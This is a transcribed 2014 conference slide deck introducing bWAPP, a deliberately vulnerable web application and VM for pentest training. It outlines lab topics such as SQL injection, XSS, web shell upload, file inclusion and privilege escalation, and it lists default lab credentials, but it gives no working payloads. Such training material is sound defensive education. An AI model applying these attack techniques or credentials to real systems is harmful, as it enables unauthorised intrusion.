b-sides orlando 2014 - superbees wanted
Post on 16-Apr-2017
632 Views
Preview:
TRANSCRIPT
What is bWAPP?
Defense Needed, Superbees Wanted
Malik Mesellem
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
1
About MeMalik Mesellem
Email| malik@itsecgames.com
LinkedIn | be.linkedin.com/in/malikmesellem
Twitter | twitter.com/MME_IT
Blog| itsecgames.blogspot.com
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
2
What is bWAPP?Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
3
What is bWAPP?Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
4
Defense NeededWeb application security is today's most overlooked aspect of securing the enterprise
Hackers are concentrating their efforts on websites and web applications
Web apps are an attractive target for cyber criminality, cyber warfare and hacktivism
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
5
Defense NeededWhy are web applications an attractive target?
Easily available via the Internet (24/7)
Mission-critical business applications with sensitive data
Often direct access to backend data
Traditional firewalls and SSL provide no protection
Many applications are custom-made == vulnerable
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
6
Defense NeededWhy are web applications an attractive target?
Easily available via the Internet (24/7)
Mission-critical business applications with sensitive data
Often direct access to backend data
Traditional firewalls and SSL provide no protection
Many applications are custom-made == vulnerable
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
7
DEFENSEis needed !
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
8
What is bWAPP?Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
9
bWAPP == defensebWAPP, or a buggy Web APPlication
Deliberately insecure web application, includes allmajor known web vulnerabilities
Helps security enthusiasts, developers and studentsto discover and to prevent issues
Prepares one for successful penetration testing and ethical hacking projects
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
10
bWAPP
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
11
bWAPPWeb application security is not just installing a firewall, or scanning a site for potential issues
Black-box penetration testing, simulating real attack scenarios, is still needed!
Confirms potential vulnerabilities, and excludes false positives
Guarantees that your defense measures are working effectively
bWAPP helps to improve your security-testing skills
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
12
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
13
OMG! Are we prepared forREAL attack scenarios???
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
14
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
15
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
16
bWAPPTestimonialsAwesome! It's good to see fantastic tools staying up to date ...
- Ed SkoudisFounder of Counter HackI just installed bWAPP 1.6 into the next release of SamuraiWTF ... Its a great app ...
- Justin SearleManaging Partner at UtiliSec
Great progress on bWAPP BTW! :)
- Vivek RamachandranOwner of SecurityTube
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
17
bWAPPTestimonialsAwesome! It's good to see fantastic tools staying up to date ...
- Ed SkoudisFounder of Counter HackI just installed bWAPP 1.6 into the next release of SamuraiWTF ... Its a great app ...
- Justin SearleManaging Partner at UtiliSec
Great progress on bWAPP BTW! :)
- Vivek RamachandranOwner of SecurityTube
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
18
bWAPPArchitecture
Open source PHP application
Backend MySQL database
Hosted on Linux/Windows Apache/IIS
Supported on WAMP or XAMPP
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
19
bWAPPFeatures (1)
Very easy to use and to understand
Well structured and documented PHP code
Different security levels (low/medium/high)
New user creation (password/secret)
Reset application/database feature
Manual intervention page
Email functionalities
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
20
bWAPPFeatures (2)
Local PHP settings file
No-authentication mode (A.I.M.)
Evil Bee mode, bypassing security checks
Evil directory, including attack scripts
WSDL file (Web Services/SOAP)
Fuzzing possibilities
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
21
bWAPPWhat makes bWAPP so unique?
Well, it has over 70 web bugs!
Covering all major known web vulnerabilities
Including all risks from the OWASP Top 10 project
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
22
bWAPPWhich bug do you want to hack today? (1)
SQL, HTML, SSI, OS Command, XML, XPath, LDAP, PHP Code,Host Header and SMTP injections
Authentication, authorization and session management issues
Malicious, unrestricted file uploads and backdoor files
Arbitrary file access and directory traversals
PHP-CGI remote code execution
Local and remote file inclusions (LFI/RFI)
Server Side Request Forgery (SSRF)
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
23
bWAPPWhich bug do you want to hack today? (2)
Configuration issues: Man-in-the-Middle, Cross-Domain policy file, FTP, WebDAV, information disclosures,...
HTTP parameter pollution and HTTP response splitting
XML External Entity attacks (XXE)
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) andweb storage issues
Unvalidated redirects and forwards
Denial-of-Service (DoS) attacks
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
24
bWAPPWhich bug do you want to hack today? (3)
Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF)
AJAX and Web Services issues (JSON/XML/SOAP)
Parameter tampering and cookie poisoning
HTTP verb tampering
Local privilege escalation
And much more
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
25
bWAPPWhich bug do you want to hack today?
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
26
bWAPP
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
27
bWAPPExternal links
Home page - www.itsecgames.com
Download location - sourceforge.net/projects/bwapp
Blog - itsecgames.blogspot.com
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
28
bee-boxEvery bee needs a home the bee-box
VM pre-installed with bWAPP
LAMP environment: Linux, Apache, MySQL and PHP
Compatible with VMware and VirtualBox
Requires zero installation
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
29
bee-boxbee-box is also made deliberately insecure
Opportunity to explore all bWAPP vulnerabilities
Gives you several ways to hack and deface bWAPP
Even possible to hack the bee-box to get full root access!
Hacking, defacing and exploitingwithout going to jail
You can downloadbee-box from here
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
30
bee-box
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
31
bee-boxFeatures (1)
Apache, MySQL and PHP installed
Several PHP extensions installed
Vulnerable PHP-CGI
phpMyAdmin installed
Postfix installed and configured
Insecure FTP and WebDAV configurations
AppArmor disabled
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
32
bee-boxFeatures (2)
Weak self-signed SSL certificate
Fine-tuned file access permissions
.htaccess files support enabled
Some basic security tools installed
Shortcuts to start, install and update bWAPP
An amazing wallpaper
An outdated Linux kernel
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
33
bWAPP & bee-boxBoth are part of the ITSEC GAMES project
A funny approach to IT security education
IT security, ethical hacking, training and fun...
All ingredients mixed together
Educational and recreational InfoSec training
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
34
bWAPP & bee-boxReady, set, and hack!
Theres just one thing to remember
The logon credentials are
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
35
bee/bug
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
36
bWAPP & bee-boxReady, set, and hack!
Theres just one thing to remember
The logon credentials are bee/bug
So please dont bug me anymore
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
37
bWAPP & bee-boxMore credentials (for wizkids only!)
bWAPP web app
bee/bug
bee-box VM
bee/bug
su: bug
MySQL database
root/bug
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
38
bWAPP & bee-boxInstallation and configuration
Install VMware Player or Oracle VirtualBox
Extract, install, and start the bee-box VM
Configure or check the IP settings
Browse to the bWAPP web app
http://[IP]/bWAPP/
Login with bee/bug
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
39
bWAPP & bee-boxGeneral application settings
settings.php, located under the bWAPP admin folder
Connection settings
SMTP settings
A.I.M. mode
Evil bee mode
Static credentials
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
40
bWAPP & bee-boxSettings
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
41
bWAPP & bee-boxA.I.M.
Authentication Is Missing, a no-authentication mode
May be used for testing web scanners and crawlers
Procedure
Change the IP address in the settings file
Point your web scanner or crawler to
http://[IP]/bWAPP/aim.php
All hell breaks loose
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
42
bWAPP & bee-boxWorst-case-scenario-options
Reset the application
http://[IP]/bWAPP/reset.php
Reset the application + database
http://[IP]/bWAPP/reset.php?secret=bWAPP
Reinstall the database
Drop the database from phpMyAdmin
http://[IP]/bWAPP/install.php
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
43
bWAPP & bee-boxHost file (optional)
Change the host file on the local machine
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
44
bWAPP & bee-boxPostfix (optional)
Reconfigure and restart Postfix on the bee-box
sudo gedit /etc/postfix/main.cf
sudo /etc/init.d/postfix restart
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
45
Finally time for aDEMO
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
46
Demo
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
47
What is bWAPP?Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
48
Penetration TestingPenetration testing, or pentesting
Method of evaluating computer, network or application security by simulating an attack
Active analysis of potential vulnerabilities by usingethical hacking techniques
Penetration tests are sometimes a component of afull security audit
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
49
Web App Penetration TestingWeb application pentesting is focusing on evaluatingthe security of a web application
Application is tested for known web vulnerabilities
Manual, automatic and semi-automatic tests
Source code analysis and web server configuration review as an option
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
50
Web App Penetration TestingIts all about identifying, exploiting, and reporting vulnerabilities
Some considerations
Commercial tools vs. open source tools
Not a best practice to use only one tool
Most commercial scanners dont exploit
False positives are not allowed!
People dont like auto-generated reports
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
51
Testing MethodologiesA simple testing methodology
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
52
Testing MethodologiesA more advanced testing methodology
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
53
OWASPOWASP, or Open Web Application Security Project
Worldwide non-profit organization focused on improving the security of software
Freely-available articles, methodologies, documentation, tools, and technologies
Vendor neutral, no recommendations for commercial products or services!
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
54
OWASPCurrent OWASP Projects
Top 10 Project and Testing Guide
Development and Code Review Guide
Application Security Verification Standard
Broken Web Applications (BWA)
Zed Attack Proxy (ZAP)
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
55
OWASPOWASP Top 10 Project, lists the 10 most severe web application security risks
Constantly updated, latest version released in 2013
Referenced by many standards, books, tools, and organizations, including MITRE and PCI DSS
Good starting point for a web application pentest
What to test? How to test? How to prevent?
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
56
OWASPOWASP Top 10 Application Security Risks
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
57
OWASPOWASP Top 10 - 2010 2013
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
58
OWASPOWASP Top 10 placement
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
59
Introduction to Kali LinuxKali Linux is a Debian-derived Linux distribution
Designed for digital forensics and penetration testing
Formerly known as BackTrack
Maintained and funded by Offensive Security
Support for x86 and ARM
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
60
Introduction to Kali LinuxIncludes many web app pentesting tools
Burp Suite
DirBuster
Metasploit
Nikto
sqlmap
w3af
WebSploit
ZAP
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
61
Hands-On LabKali Linux - Installation and basic usage
Strongly advised to disable AV
Extract, install, and start the VM
VM on Bridged ( NAT)
Login with root/toor
Check/configure IP and language settings
dhclient eth0 -v
Explore Kali Linux and its toolsWhen facing problems,ask for a LiveDVD...
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
62
Intercepting ProxiesIntercepting proxies are testing tools acting as a legitimate Man-in-the-Middle (MitM)
Located between the browser and the web application
Ability to intercept and to modify requests/responses
Provide a historical record of all requests
Include integrated tools to discover vulnerabilities,and to crawl and brute force files and directories
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
63
Intercepting ProxiesZAP, Zed Attack Proxy
OWASP project, by Simon Bennetts
Java application, released in September 2010
Fork of the Paros intercepting proxy
Pentesting tool for finding vulnerabilities
Provides automated scanning, as well as a set of toolsto find security vulnerabilities manually
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
64
Intercepting ProxiesZAP, Zed Attack Proxy
Functionalities
Intercepting proxy, listening on TCP/8080
Traditional and AJAX spider
Automated and passive scanner
Fuzzing and brute force capabilities
Smartcard and client certificate support
Authentication and session support
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
65
Intercepting ProxiesZAP, Zed Attack Proxy
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
66
DemoZAP, Zed Attack Proxy
Parameter/cookie tampering
Online password attack
Vulnerability detection
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
67
Hands-On LabZAP, Zed Attack Proxy
Parameter/cookie tampering
Online password attack
Vulnerability detection
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
68
Commercial Web ScannersNetsparker
Automated false positive free web security scanner
Identifies security issues and vulnerabilities such as SQL injection and Cross-Site Scripting (XSS)
Automatically exploits detected vulnerabilities to ensure no false positives are reported
Site: https://www.netsparker.com/
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
69
Commercial Web Scanners
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
70
Commercial Web ScannersNetsparker
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
71
Hands-On LabNetsparker
Non-authenticated scan
Authenticated scan
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
72
Ready toExploitsome bugs?
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
73
What is bWAPP?Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
74
Hungry Evil BeesHacking, Defacing and Exploiting
SQL / HTML / SSI Injection
Cross-Site Scripting (XSS)
Denial-of-Service (DoS)
PHP-CGI Remote Code Exec
Unrestricted File Uploads
File Inclusions (LFI/RFI)
Local Privilege Escalation
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
75
Hands-On LabSQL Injection
Bypassing login forms
Manually extracting data
Testing for blind SQL injection
Automated SQL injection
Website defacement
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
76
Hands-On LabHTML Injection
Website defacement
Page redirection
Phishing attack
Client-side exploitation
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
77
Hands-On LabSSI Injection
Disclosing sensitive files
Website defacement
Shell access
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
78
Hands-On LabCross-Site Scripting
Detecting XSS
Session hijacking
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
79
Hands-On LabDenial-of-Service
HTTP Slow POST
XML Bomb
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
80
Hands-On LabPHP-CGI Remote Code Execution
API and PHP version verification
Source code disclosure
Website defacement
OWASP ZAP
Metasploit
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
81
Hands-On LabUnrestricted File Uploads
Web shell creation
Shell access, evading firewalls
Website defacement
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
82
Hands-On LabFile Inclusions
Disclosing sensitive files
Website defacement
Shell access, evading firewalls
Escalating privileges...
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
83
What is bWAPP?Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
84
Superbees WantedHi little bees, during this workshop we
Defaced your website 5 times
Compromised your server
Compromised your clients
Made your server unreachable
Hijacked your session
Stole your credentials
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
85
And we have so much more bugs to exploit
Definitely time to improve your web security
Defense is needed, and testing is required!
Downloading bWAPP is a first start
Remember: every bee needs a superbee
Are you that superbee?Superbees Wanted
@MME_IT#bWAPP
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
86
Contact MeMalik Mesellem
Email| malik@itsecgames.com
LinkedIn | be.linkedin.com/in/malikmesellem
Twitter | twitter.com/MME_IT
Blog| itsecgames.blogspot.com
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
87
Cheat SheetHi little bees we have a cheat sheet for you
Containing all bWAPP solutions
Follow us on Twitter, and ask for our cheat sheet
You will definitely become a superbee!
@MME_IT#bWAPP
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
88
TrainingAttacking & Defending Web Apps with bWAPP
2-day comprehensive web security course
Focus on attack and defense techniques!
More info: http://goo.gl/ASuPa1 (pdf)
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
89
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
90
top related